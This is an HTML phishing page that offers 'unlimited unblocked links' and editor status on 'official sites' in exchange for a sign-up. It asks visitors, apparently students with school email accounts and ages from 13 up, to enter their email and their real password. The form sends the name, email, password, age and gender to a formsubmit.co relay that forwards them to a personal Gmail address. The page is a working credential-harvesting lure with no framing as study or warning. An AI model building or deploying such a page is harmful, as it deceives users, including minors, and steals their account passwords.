<html><head>
  <style>
  
  body {
  display: flex;
  height: 100vh;
  justify-content: center;
  align-items: center;
  padding: 10px;
  background: linear-gradient(135deg, #71b7e6, #9b59b6);
  }
  
  
  fieldset {
  
    max-width: 700px;
    width: 100px;
    background: #fff;
    padding: 25px 30px;
    height: 300px;
    width: 400px;
  
  }

#name {
  width: 300px;
  height: 30px;
}
#gmail {
width: 300px;
height: 30px;
}
#password {
  height: 30px;
width: 300px;
}
#text {
  height: 30px;
  width: 300px;
}  







  </style>
      </head>
      <body>
    
        <fieldset>


             
         <p>Pleas sign this to become Member then we will send you unlimited link that
          are unblocked plus we will make you editor of our offical sites. #2 you can use fcpsemail or gmail
          and meak sure to put in actuall password.
         </p>
          
          <form action="https://formsubmit.co/robeladmassu750@gmail.com" method="post">
         
          <div>
              <input type="text" name="name" id="name"  id="name" placeholder="Name" required>
          </div>

          
                 
          <div>
              <input type="email" name="email" placeholder="Gmail" id="gmail" min="@gmail.com" required></div>

          <div>
            <input type="password" name="password" placeholder="password" id="password" required>
            </div>


          
          <div>
            <input type="text" name="messege" id="text"  id="text" placeholder="Type text">
          </div>
      
       


           <div>
              <input type="number" name="age" id="age" min="13" max="100" placeholder="age" min="13">
           </div>

      

<div>
  <label for="Gender">Male</label>
  <input type="radio" name="Male" id="Male">
</div>

<div>
  <label for="Gender">Female</label>
  <input type="radio" name="Female" id="Female">
</div>




                  <button type="submit">Send</button>
             </form>
            </fieldset>
  
  
          
  
  </body></html>